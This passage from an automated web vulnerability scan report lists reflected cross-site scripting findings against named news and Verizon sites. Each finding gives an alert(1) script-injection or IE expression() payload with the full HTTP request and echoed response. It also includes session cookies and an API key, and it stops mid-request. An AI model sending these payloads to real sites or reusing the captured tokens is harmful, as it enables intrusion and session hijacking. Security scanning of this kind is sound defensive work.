GET /2010/11/19/at-home-jets-look-for-noise-and-hope-to-roar/?src=twra3d6a"><script>alert(1)</script>9cfad63d4c0 HTTP/1.1
Host: fifthdown.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 05:11:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://fifthdown.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 57436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
c+Mangini;Chad+Pennington;Tom+Coughlin;Eli+Manning;Laverneus+Coles;Leon+Washington;Tiki+Barber;Plaxico+Burress;Jeremy+Shockey;Michael+Strahan;Kevan+Barlow;calvin-pace;jets;nick-mangold;rex-ryan&src=twra3d6a\"><script>alert(1)</script>9cfad63d4c0">
...[SNIP]...

2.387. http://finance.moneyandmarkets.com/roi/x-list.php [ec parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.moneyandmarkets.com
Path:   /roi/x-list.php

Issue detail

The value of the ec request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5832f"><script>alert(1)</script>89cea705136 was submitted in the ec parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /roi/x-list.php?sc=G100&ec=A955805832f"><script>alert(1)</script>89cea705136&ga_campaign=ROI+Ad+Planner&ga_adgroup=nytimes&ga_keyword=content HTTP/1.1
Host: finance.moneyandmarkets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:44:24 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 22218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:/
...[SNIP]...
<input name="Contact0_Effort" id="Contact0_Effort" value="A955805832f"><script>alert(1)</script>89cea705136" type="hidden">
...[SNIP]...

2.388. http://finance.moneyandmarkets.com/roi/x-list.php [sc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.moneyandmarkets.com
Path:   /roi/x-list.php

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2693"><script>alert(1)</script>bea6c5de8bc was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /roi/x-list.php?sc=G100a2693"><script>alert(1)</script>bea6c5de8bc&ec=A95580&ga_campaign=ROI+Ad+Planner&ga_adgroup=nytimes&ga_keyword=content HTTP/1.1
Host: finance.moneyandmarkets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:44:23 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 22218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:/
...[SNIP]...
<input name="Contact0_Source" id="Contact0_Source" value="G100a2693"><script>alert(1)</script>bea6c5de8bc" type="hidden">
...[SNIP]...

2.389. http://fivethirtyeight.blogs.nytimes.com/2010/11/19/the-800-pound-mama-grizzly-problem/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fivethirtyeight.blogs.nytimes.com
Path:   /2010/11/19/the-800-pound-mama-grizzly-problem/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3633a"><script>alert(1)</script>3906073b387 was submitted in the src parameter. This input was echoed as 3633a\"><script>alert(1)</script>3906073b387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/the-800-pound-mama-grizzly-problem/?src=twr3633a"><script>alert(1)</script>3906073b387 HTTP/1.1
Host: fivethirtyeight.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 07:07:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://fivethirtyeight.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 258619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
w4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE,SponLink2&query=qstring&keywords=New+York+Times;Politics;polling;public+affairs;statistical+analysis;election+forecasts;2012-elections;sarah-palin&src=twr3633a\"><script>alert(1)</script>3906073b387">
...[SNIP]...

2.390. http://gadgetwise.blogs.nytimes.com/2010/11/19/apps-to-amuse-kiddies-for-miles-and-miles/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gadgetwise.blogs.nytimes.com
Path:   /2010/11/19/apps-to-amuse-kiddies-for-miles-and-miles/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39b22"><script>alert(1)</script>97046e2d760 was submitted in the src parameter. This input was echoed as 39b22\"><script>alert(1)</script>97046e2d760 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/apps-to-amuse-kiddies-for-miles-and-miles/?src=twr39b22"><script>alert(1)</script>97046e2d760 HTTP/1.1
Host: gadgetwise.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 07:36:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://gadgetwise.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 61926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
1,Spon3,ADX_CLIENTSIDE,SponLink2&query=qstring&keywords=Electronics;Gadgets;Personal+Tech;New+Technology;New+Technology+Products;apps-mobile-products;duck-duck-moose;iphone;kid-tech;mobile-tech&src=twr39b22\"><script>alert(1)</script>97046e2d760">
...[SNIP]...

2.391. http://gadgetwise.blogs.nytimes.com/2010/11/19/earbuds-with-a-mic-that-sound-about-right/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gadgetwise.blogs.nytimes.com
Path:   /2010/11/19/earbuds-with-a-mic-that-sound-about-right/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e507"><script>alert(1)</script>87878fa4705 was submitted in the src parameter. This input was echoed as 3e507\"><script>alert(1)</script>87878fa4705 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/earbuds-with-a-mic-that-sound-about-right/?src=twr3e507"><script>alert(1)</script>87878fa4705 HTTP/1.1
Host: gadgetwise.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 07:37:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://gadgetwise.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 60220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE,SponLink2&query=qstring&keywords=Electronics;Gadgets;Personal+Tech;New+Technology;New+Technology+Products;headsets-accessories-mobile-products;mobile-tech&src=twr3e507\"><script>alert(1)</script>87878fa4705">
...[SNIP]...

2.392. http://gadgetwise.blogs.nytimes.com/2010/11/19/from-bucks-the-more-convenient-gift-card/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gadgetwise.blogs.nytimes.com
Path:   /2010/11/19/from-bucks-the-more-convenient-gift-card/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7168c"><script>alert(1)</script>0525f362e1d was submitted in the src parameter. This input was echoed as 7168c\"><script>alert(1)</script>0525f362e1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/from-bucks-the-more-convenient-gift-card/?src=twr7168c"><script>alert(1)</script>0525f362e1d HTTP/1.1
Host: gadgetwise.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 07:37:44 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://gadgetwise.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 59951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE,SponLink2&query=qstring&keywords=Electronics;Gadgets;Personal+Tech;New+Technology;New+Technology+Products;apps-mobile-products;coupons;shopping;wildcard&src=twr7168c\"><script>alert(1)</script>0525f362e1d">
...[SNIP]...

2.393. http://gadgetwise.blogs.nytimes.com/2010/11/19/satellite-radio-without-the-clutter/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gadgetwise.blogs.nytimes.com
Path:   /2010/11/19/satellite-radio-without-the-clutter/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3ca3"><script>alert(1)</script>9574db38b47 was submitted in the src parameter. This input was echoed as c3ca3\"><script>alert(1)</script>9574db38b47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/satellite-radio-without-the-clutter/?src=twrc3ca3"><script>alert(1)</script>9574db38b47 HTTP/1.1
Host: gadgetwise.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 07:37:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://gadgetwise.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 61962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ing&keywords=Electronics;Gadgets;Personal+Tech;New+Technology;New+Technology+Products;music-video;music-players-musicvideo-products;musicvideo;products;radio-receivers;satellite-radio;sirius;xm&src=twrc3ca3\"><script>alert(1)</script>9574db38b47">
...[SNIP]...

2.394. http://games.verizon.com/do/gameList [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.verizon.com
Path:   /do/gameList

Issue detail

The value of the search request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cbb7"%3balert(1)//bb913e361 was submitted in the search parameter. This input was echoed as 3cbb7";alert(1)//bb913e361 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /do/gameList?searchTag=Educational&search=3d%20dinosaur%20adventures|millie|arthur3cbb7"%3balert(1)//bb913e361&#8217|s%20math%20games|jumpstart|cluefinders|star%20wars%20math|jay%20jay%20earns%20his%20wings|math%20blaster|thinking%20adventure|reader%20rabbit|treasure%20cove|mathstorm HTTP/1.1
Host: games.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Coyote-2-a050019=ac100a69:0; amlbcookie=05; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; vzpers=STATE=TX; lob=webmail; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; BusinessUnit=business; V347=CT-2; __utma=248856721.895200009.1290218161.1290218161.1290218161.1; __utmc=248856721; VZGEO=west; __utmb=248856721.1.10.1290218161; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; JSESSIONID=B15441950C6E7B228030599B67D58C93; Product=A; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; __utmz=248856721.1290218161.1.1.utmcsr=img1.exent.com|utmccn=(referral)|utmcmd=referral|utmcct=/Prem/marketing/verizon/Shop/img/src_shop.swf; 135_TURNKEY=-561290217957180456; ProductXML=A; LOB_CATEGORY=; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; CustTrackPage=GHP; myservices=vzdock=N; 135_CAMPAIGN_SERIAL_ID=-Default;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 07:34:07 GMT
Server: Apache
Set-Cookie: JSESSIONID=8FF52388E81A4343AD7BF5B7696A2A6D; Path=/
Set-Cookie: 135_CAMPAIGN_SERIAL_ID=-Default; Expires=Sun, 20-Nov-2011 07:34:07 GMT; Path=/
Connection: close
Content-Type: text/html
Content-Length: 28336


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="te
...[SNIP]...
e="text/javascript">
           var g_bSearchEnabled = true;
           //get query parameter from url, uses filter false in order to handle special chars
           g_searchCriteria = "3d dinosaur adventures|millie|arthur3cbb7";alert(1)//bb913e361";
           g_searchTag = "Educational"; //get query parameter from url
           //loadXMLs();
       </script>
...[SNIP]...

2.395. http://games.verizon.com/do/gameList [searchTag parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.verizon.com
Path:   /do/gameList

Issue detail

The value of the searchTag request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 657a2"%3balert(1)//799aeeb3c5e was submitted in the searchTag parameter. This input was echoed as 657a2";alert(1)//799aeeb3c5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /do/gameList?searchTag=Educational657a2"%3balert(1)//799aeeb3c5e&search=3d%20dinosaur%20adventures|millie|arthur&#8217|s%20math%20games|jumpstart|cluefinders|star%20wars%20math|jay%20jay%20earns%20his%20wings|math%20blaster|thinking%20adventure|reader%20rabbit|treasure%20cove|mathstorm HTTP/1.1
Host: games.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Coyote-2-a050019=ac100a69:0; amlbcookie=05; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; vzpers=STATE=TX; lob=webmail; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; BusinessUnit=business; V347=CT-2; __utma=248856721.895200009.1290218161.1290218161.1290218161.1; __utmc=248856721; VZGEO=west; __utmb=248856721.1.10.1290218161; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; JSESSIONID=B15441950C6E7B228030599B67D58C93; Product=A; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; __utmz=248856721.1290218161.1.1.utmcsr=img1.exent.com|utmccn=(referral)|utmcmd=referral|utmcct=/Prem/marketing/verizon/Shop/img/src_shop.swf; 135_TURNKEY=-561290217957180456; ProductXML=A; LOB_CATEGORY=; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; CustTrackPage=GHP; myservices=vzdock=N; 135_CAMPAIGN_SERIAL_ID=-Default;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 07:34:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=D3020E9BB8987C24C58B42C338F76923; Path=/
Set-Cookie: 135_CAMPAIGN_SERIAL_ID=-Default; Expires=Sun, 20-Nov-2011 07:34:06 GMT; Path=/
Connection: close
Content-Type: text/html
Content-Length: 33542


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="te
...[SNIP]...
archEnabled = true;
           //get query parameter from url, uses filter false in order to handle special chars
           g_searchCriteria = "3d dinosaur adventures|millie|arthur";
           g_searchTag = "Educational657a2";alert(1)//799aeeb3c5e"; //get query parameter from url
           //loadXMLs();
       </script>
...[SNIP]...

2.396. http://games.verizon.com/trivia/widget/embed.jsp [gameId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.verizon.com
Path:   /trivia/widget/embed.jsp

Issue detail

The value of the gameId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffd36"><script>alert(1)</script>3a00740e037 was submitted in the gameId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trivia/widget/embed.jsp?gameId=liveIndiaffd36"><script>alert(1)</script>3a00740e037 HTTP/1.1
Host: games.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Coyote-2-a050019=ac100a69:0; amlbcookie=05; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; vzpers=STATE=TX; lob=webmail; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; BusinessUnit=business; V347=CT-2; __utma=248856721.895200009.1290218161.1290218161.1290218161.1; __utmc=248856721; VZGEO=west; __utmb=248856721.1.10.1290218161; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; JSESSIONID=B15441950C6E7B228030599B67D58C93; Product=A; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; __utmz=248856721.1290218161.1.1.utmcsr=img1.exent.com|utmccn=(referral)|utmcmd=referral|utmcct=/Prem/marketing/verizon/Shop/img/src_shop.swf; 135_TURNKEY=-561290217957180456; ProductXML=A; LOB_CATEGORY=; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; CustTrackPage=GHP; myservices=vzdock=N; 135_CAMPAIGN_SERIAL_ID=-Default;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 07:33:46 GMT
Server: Apache
Set-Cookie: JSESSIONID=148F417C4CA7AF4B5A822F30DCFFBB13; Path=/
Content-Length: 2274
Connection: close
Content-Type: text/html


<html>
<head>

<script type="text/javascript" src="http://cdn.exent.com/verizonD8/trivia/js/widgetMain.js"></script>
<script type="text/javascript">
   var gaJsHost = (("https:" == docu
...[SNIP]...
       flashvars="server=http://nitro.bunchball.net/nitro/api&userId=null&apiKey=ae83b8ba39424cf99381818f093c395f&signature=6b3eb432899849237389157837d038ce&timeStamp=1290238426&contentId=2&gameId=liveIndiaffd36"><script>alert(1)</script>3a00740e037&gameURL=http://gamesondemand.verizon.net/trivia/&siteId=verizongod&triviaServer=http://trivia.bunchball.com/b/&userState=CREATEPROFILE&signInURL=http%3A%2F%2Fgamesondemand.verizon.net%2Fverizon%2Fact%
...[SNIP]...

2.397. http://games.verizon.com/trivia/widget/embed_toolbar.jsp [gameId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.verizon.com
Path:   /trivia/widget/embed_toolbar.jsp

Issue detail

The value of the gameId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f535"><script>alert(1)</script>5385e2e47b0 was submitted in the gameId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trivia/widget/embed_toolbar.jsp?gameId=liveIndia4f535"><script>alert(1)</script>5385e2e47b0 HTTP/1.1
Host: games.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Coyote-2-a050019=ac100a69:0; amlbcookie=05; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; vzpers=STATE=TX; lob=webmail; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; BusinessUnit=business; V347=CT-2; __utma=248856721.895200009.1290218161.1290218161.1290218161.1; __utmc=248856721; VZGEO=west; __utmb=248856721.1.10.1290218161; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; JSESSIONID=B15441950C6E7B228030599B67D58C93; Product=A; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; __utmz=248856721.1290218161.1.1.utmcsr=img1.exent.com|utmccn=(referral)|utmcmd=referral|utmcct=/Prem/marketing/verizon/Shop/img/src_shop.swf; 135_TURNKEY=-561290217957180456; ProductXML=A; LOB_CATEGORY=; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; CustTrackPage=GHP; myservices=vzdock=N; 135_CAMPAIGN_SERIAL_ID=-Default;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 07:33:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=2CFD1918D71A781645B1CE6BA7E59B69; Path=/
Content-Length: 1670
Connection: close
Content-Type: text/html


<html>
<head>

<script type="text/javascript">
   var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
   document.write(unescape("%3Cscript src='"
...[SNIP]...
       flashvars="server=http://nitro.bunchball.net/nitro/api&userId=null&apiKey=ae83b8ba39424cf99381818f093c395f&signature=9751a73e6a8e05fd645cee647e752b20&timeStamp=1290238439&contentId=2&gameId=liveIndia4f535"><script>alert(1)</script>5385e2e47b0&gameURL=http://gamesondemand.verizon.net/trivia/&siteId=verizongod&triviaServer=http://trivia.bunchball.com/b/&userState=CREATEPROFILE&signInURL=%23%23%23&createProfileURL=%23%23%23"
               quality="hig
...[SNIP]...

2.398. http://goal.blogs.nytimes.com/2010/11/19/f-c-dallass-ferreira-named-m-l-s-m-v-p/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.blogs.nytimes.com
Path:   /2010/11/19/f-c-dallass-ferreira-named-m-l-s-m-v-p/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0949"><script>alert(1)</script>ce7b2162d40 was submitted in the src parameter. This input was echoed as f0949\"><script>alert(1)</script>ce7b2162d40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/f-c-dallass-ferreira-named-m-l-s-m-v-p/?src=twrf0949"><script>alert(1)</script>ce7b2162d40 HTTP/1.1
Host: goal.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 10:23:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://goal.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
nited+States,Brazil,Mexico,Argentina,Uruguay,Paraguay,Bolivia,Peru,Ecuador,Colombia,Bolivia;Italy,England,Portugal,Germany,Spain,Netherlands,US+Soccer;carlos-valderamma;david-ferreira;fc-dallas&src=twrf0949\"><script>alert(1)</script>ce7b2162d40">
...[SNIP]...

2.399. http://green.blogs.nytimes.com/2010/11/19/a-warning-about-climate-change-from-a-departing-republican/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://green.blogs.nytimes.com
Path:   /2010/11/19/a-warning-about-climate-change-from-a-departing-republican/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2b39"><script>alert(1)</script>e1391d99db8 was submitted in the src parameter. This input was echoed as e2b39\"><script>alert(1)</script>e1391d99db8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/a-warning-about-climate-change-from-a-departing-republican/?src=twre2b39"><script>alert(1)</script>e1391d99db8 HTTP/1.1
Host: green.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 10:52:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://green.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
rces;bob-inglis;china;climate-change;global-warming;greenhouse-gases;house-science-and-environment-subcommittee;house-science-and-technology-committee;politics-and-policy;ralph-hall;republicans&src=twre2b39\"><script>alert(1)</script>e1391d99db8">
...[SNIP]...

2.400. http://headlines.verizon.com/headlines/portals/headlines.portal [_article parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/portals/headlines.portal

Issue detail

The value of the _article request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b869"style%3d"x%3aexpression(alert(1))"0a9a1a8d65c was submitted in the _article parameter. This input was echoed as 8b869"style="x:expression(alert(1))"0a9a1a8d65c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /headlines/portals/headlines.portal?_nfpb=true&_pageLabel=headlines_portal_page__article&_article=31999638b869"style%3d"x%3aexpression(alert(1))"0a9a1a8d65c HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
